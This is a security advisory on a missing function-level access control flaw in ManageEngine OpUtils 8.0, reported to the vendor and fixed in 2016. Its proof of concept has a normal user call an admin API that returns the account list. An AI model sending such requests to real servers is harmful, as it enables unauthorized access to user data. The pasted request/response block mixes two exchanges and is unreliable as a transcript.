Manage Engine OPutils 8.0 Authorization Bypass

`==================================================  
Missing Function Level Access control Vulnerability in OPutils  
==================================================  
  
. contents:: Table Of Content  
  
Overview  
========  
  
Title:- Missing Function Level Access control Vulnerability in ManageEngine OpUtils  
Author: Kaustubh G. Padwad  
Vendor: ZOHO Corp  
Product: OPUTILS  
Tested Version: : OPUTILS 8.0  
Severity: Medium  
  
Advisory ID  
============  
2016-06-Manage_Engine  
  
  
About the Product:  
==================  
OpUtils is a Switch Port & IP Address Management software that helps network engineers manage their Switches and IP Address Space with ease. With its comprehensive set of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device intrusion, keep a check on bandwidth usage, monitoring availability of critical devices, backing up Cisco configuration files and more.  
  
  
Description:   
============  
  
This Missing Function Level Access Control vulnerability enables an Normal user to execute the Adinisitative Task.   
  
Vulnerability Class:  
====================  
2013-A7-Missing Function Level Access Control https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control  
  
  
How to Reproduce: (POC):  
========================  
  
* Get The administrative Task URL from either demo site or download locally  
  
* Now Login With Normal User  
  
* Paste the below requst or any other for Ex. http://IP-OF-Server:7080/oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS  
  
POC  
====  
  
Burp Requst   
-----------  
GET /oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS HTTP/1.1  
  
Host: 192.168.1.10:7080  
  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0  
  
Accept: */*  
  
Accept-Language: en-US,en;q=0.5  
  
  
  
Response  
--------  
  
  
HTTP/1.1 200 OK  
erver: Apache-Coyote/1.1  
  
Content-Type: application/json;charset=UTF-8  
  
Content-Length: 589  
  
Date: Thu, 04 Feb 2016 14:28:25 GMT  
  
  
  
{"result":[{"ad-domain-name":"","user-name":"admin","account-created-time":"30 Jan 16, 12:20 AM","Action":"","user-contactinfo-id":"1","user-role":"Administrator","user-description":"--","user-phone-number":"","user-email":"","user-id":"1","ad-domain-id":"","user-login-id":"1"},{"ad-domain-name":"","user-name":"kk","account-created-time":"30 Jan 16, 12:23 AM","Action":"","user-contactinfo-id":"2","user-role":"Read Only User","user-description":"--","user-phone-number":"","user-email":"","user-id":"2","ad-domain-id":"","user-login-id":"2"}],"input":"{userId=null}","status":"Success"}  
Server: Apache-Coyote/1.1  
  
Access-Control-Allow-Origin: *  
  
Access-Control-Allow-Methods: GET,POST  
  
Access-Control-Max-Age: 5000  
  
Content-Type: application/json;charset=UTF-8  
  
Date: Sat, 30 Jan 2016 21:39:03 GMT  
  
Content-Length: 19  
  
  
  
{"resolved":true}  
  
Accept-Encoding: gzip, deflate  
  
X-Requested-With: XMLHttpRequest  
  
Referer: http://192.168.1.10:7080/apiclient/ember/index.jsp  
  
Cookie: OPUTILSJSESSIONID=C256E5B41CC23B33ACF94D206E243FB2; JSESSIONID=B59D8FD4B17DB7200A991299F4034DF1; OPUTILSJSESSIONIDSSO=28A377BA0B7D0C6E21D1E2B3A3E4A371  
  
Connection: keep-alive  
  
Mitigation  
==========  
Upgrade to NextService Pack  
  
Disclosure:   
===========  
04-Feb-2016 Repoerted to vendor  
11-Feb-2016 Fixed By Vendor  
  
credits:  
========  
* Kaustubh Padwad  
* Information Security Researcher  
* [email protected]  
* https://twitter.com/s3curityb3ast  
* http://breakthesec.com  
* https://www.linkedin.com/in/kaustubhpadwad  
`